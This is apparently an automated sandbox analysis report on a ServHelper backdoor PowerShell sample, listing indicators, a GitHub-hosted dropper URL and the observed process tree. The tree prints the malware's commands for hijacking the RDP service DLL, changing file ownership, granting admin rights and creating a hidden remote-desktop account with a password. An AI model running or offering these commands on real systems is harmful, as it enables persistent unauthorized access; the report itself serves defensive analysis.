servhelper | f00f8b0d2602fc2e8bcf5899377f6a23beae9ea9df2c0a3c4e9aad4cae2ef522

Analysis

max time kernel
147s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
06-03-2024 18:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b80e44d9eedd5fff1cd3ff0cfc1258af.ps1
Size

2.5MB
MD5

b80e44d9eedd5fff1cd3ff0cfc1258af
SHA1

492003201b7f1a0a12230f2e245718de81bbad78
SHA256

f00f8b0d2602fc2e8bcf5899377f6a23beae9ea9df2c0a3c4e9aad4cae2ef522
SHA512

326c4b9296cc401c43fa9f138cb9eebf416baa0418084a1fc22b88e0cbfa1bfaaee4052c313b242b50cbd69663e2a943f9bd80beb84c735cca7b952fd881f47a
SSDEEP

24576:faToNdX2E3YlwTgGbjj9PNwQ16RQx3WE+ygGBwf7Lx7Nhq39M//qRiQlrUUDKKbu:CgdBx6QAE+kqhjqAqQQvmEloj4IXfBh

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 8 IoCs

flow	pid	Process
42	2028	powershell.exe
44	2028	powershell.exe
47	2028	powershell.exe
50	2028	powershell.exe
52	2028	powershell.exe
54	2028	powershell.exe
56	2028	powershell.exe
76	1880	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
900	icacls.exe
1460	icacls.exe
3172	icacls.exe
1904	icacls.exe
60	takeown.exe
5036	icacls.exe
3480	icacls.exe
4540	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Deletes itself 1 IoCs

pid	Process
1880	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
2056	Process not Found
2056	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
900	icacls.exe
1460	icacls.exe
3172	icacls.exe
1904	icacls.exe
60	takeown.exe
5036	icacls.exe
3480	icacls.exe
4540	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000b00000002321f-90.dat	upx
behavioral2/files/0x000700000002322a-91.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
41	raw.githubusercontent.com
42	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dmroyzk5.cji.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC11E.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nedxs31j.tw1.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC13F.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC16E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC1AE.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC0CF.tmp	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3480	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1624	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	44	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	47	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1880	powershell.exe
1880	powershell.exe
1408	powershell.exe
1408	powershell.exe
5064	powershell.exe
5064	powershell.exe
5064	powershell.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
2028	powershell.exe
2028	powershell.exe
2028	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
692	Process not Found
692	Process not Found

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeRestorePrivilege	3480	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	3480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeAuditPrivilege	3480	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeAuditPrivilege	3480	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2720	WMIC.exe
Token: SeAuditPrivilege	2720	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2720	WMIC.exe
Token: SeAuditPrivilege	2720	WMIC.exe
Token: SeDebugPrivilege	2028	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1880 wrote to memory of 4976	1880	powershell.exe	88
PID 1880 wrote to memory of 4976	1880	powershell.exe	88
PID 4976 wrote to memory of 1680	4976	csc.exe	89
PID 4976 wrote to memory of 1680	4976	csc.exe	89
PID 1880 wrote to memory of 1408	1880	powershell.exe	93
PID 1880 wrote to memory of 1408	1880	powershell.exe	93
PID 1880 wrote to memory of 5064	1880	powershell.exe	101
PID 1880 wrote to memory of 5064	1880	powershell.exe	101
PID 1880 wrote to memory of 4492	1880	powershell.exe	104
PID 1880 wrote to memory of 4492	1880	powershell.exe	104
PID 1880 wrote to memory of 60	1880	powershell.exe	108
PID 1880 wrote to memory of 60	1880	powershell.exe	108
PID 1880 wrote to memory of 5036	1880	powershell.exe	109
PID 1880 wrote to memory of 5036	1880	powershell.exe	109
PID 1880 wrote to memory of 3480	1880	powershell.exe	110
PID 1880 wrote to memory of 3480	1880	powershell.exe	110
PID 1880 wrote to memory of 4540	1880	powershell.exe	111
PID 1880 wrote to memory of 4540	1880	powershell.exe	111
PID 1880 wrote to memory of 900	1880	powershell.exe	112
PID 1880 wrote to memory of 900	1880	powershell.exe	112
PID 1880 wrote to memory of 1460	1880	powershell.exe	113
PID 1880 wrote to memory of 1460	1880	powershell.exe	113
PID 1880 wrote to memory of 3172	1880	powershell.exe	114
PID 1880 wrote to memory of 3172	1880	powershell.exe	114
PID 1880 wrote to memory of 1904	1880	powershell.exe	115
PID 1880 wrote to memory of 1904	1880	powershell.exe	115
PID 1880 wrote to memory of 4552	1880	powershell.exe	116
PID 1880 wrote to memory of 4552	1880	powershell.exe	116
PID 1880 wrote to memory of 1624	1880	powershell.exe	117
PID 1880 wrote to memory of 1624	1880	powershell.exe	117
PID 1880 wrote to memory of 2352	1880	powershell.exe	118
PID 1880 wrote to memory of 2352	1880	powershell.exe	118
PID 1880 wrote to memory of 1280	1880	powershell.exe	119
PID 1880 wrote to memory of 1280	1880	powershell.exe	119
PID 1280 wrote to memory of 4892	1280	net.exe	120
PID 1280 wrote to memory of 4892	1280	net.exe	120
PID 1880 wrote to memory of 4700	1880	powershell.exe	121
PID 1880 wrote to memory of 4700	1880	powershell.exe	121
PID 4700 wrote to memory of 1448	4700	cmd.exe	122
PID 4700 wrote to memory of 1448	4700	cmd.exe	122
PID 1448 wrote to memory of 3212	1448	cmd.exe	123
PID 1448 wrote to memory of 3212	1448	cmd.exe	123
PID 3212 wrote to memory of 4536	3212	net.exe	124
PID 3212 wrote to memory of 4536	3212	net.exe	124
PID 1880 wrote to memory of 664	1880	powershell.exe	125
PID 1880 wrote to memory of 664	1880	powershell.exe	125
PID 664 wrote to memory of 2756	664	cmd.exe	126
PID 664 wrote to memory of 2756	664	cmd.exe	126
PID 2756 wrote to memory of 3388	2756	cmd.exe	127
PID 2756 wrote to memory of 3388	2756	cmd.exe	127
PID 3388 wrote to memory of 3604	3388	net.exe	128
PID 3388 wrote to memory of 3604	3388	net.exe	128
PID 2952 wrote to memory of 3684	2952	cmd.exe	132
PID 2952 wrote to memory of 3684	2952	cmd.exe	132
PID 3684 wrote to memory of 228	3684	net.exe	133
PID 3684 wrote to memory of 228	3684	net.exe	133
PID 4412 wrote to memory of 4504	4412	cmd.exe	136
PID 4412 wrote to memory of 4504	4412	cmd.exe	136
PID 4504 wrote to memory of 4872	4504	net.exe	137
PID 4504 wrote to memory of 4872	4504	net.exe	137
PID 2900 wrote to memory of 4900	2900	cmd.exe	140
PID 2900 wrote to memory of 4900	2900	cmd.exe	140
PID 4900 wrote to memory of 4516	4900	net.exe	141
PID 4900 wrote to memory of 4516	4900	net.exe	141

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b80e44d9eedd5fff1cd3ff0cfc1258af.ps1
1⤵
- Blocklisted process makes network request
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1880
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sf05lkeh\sf05lkeh.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4976
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7129.tmp" "c:\Users\Admin\AppData\Local\Temp\sf05lkeh\CSC5F55EBD4B70F4F4BB0172FD09F45947A.TMP"
    3⤵
    PID:1680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Windows\system32\takeown.exe
  "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:60
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:5036
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:3480
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4540
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:900
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1460
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3172
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1904
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  2⤵
  PID:4552
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  2⤵
  - Sets DLL path for service in the registry
  - Modifies registry key
  PID:1624
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  2⤵
  PID:2352
- C:\Windows\system32\net.exe
  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:4892
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\system32\cmd.exe
    cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1448
  - - C:\Windows\system32\net.exe
      net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3212
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        5⤵
        
        PID:4536
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:664
- - C:\Windows\system32\cmd.exe
    cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\system32\net.exe
      net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        5⤵
        
        PID:3604
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
  2⤵
  PID:3484

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2952
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:228

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc S6iPiumh /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4412
- C:\Windows\system32\net.exe
  net.exe user wgautilacc S6iPiumh /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc S6iPiumh /add
    3⤵
    PID:4872

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2900
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:4516

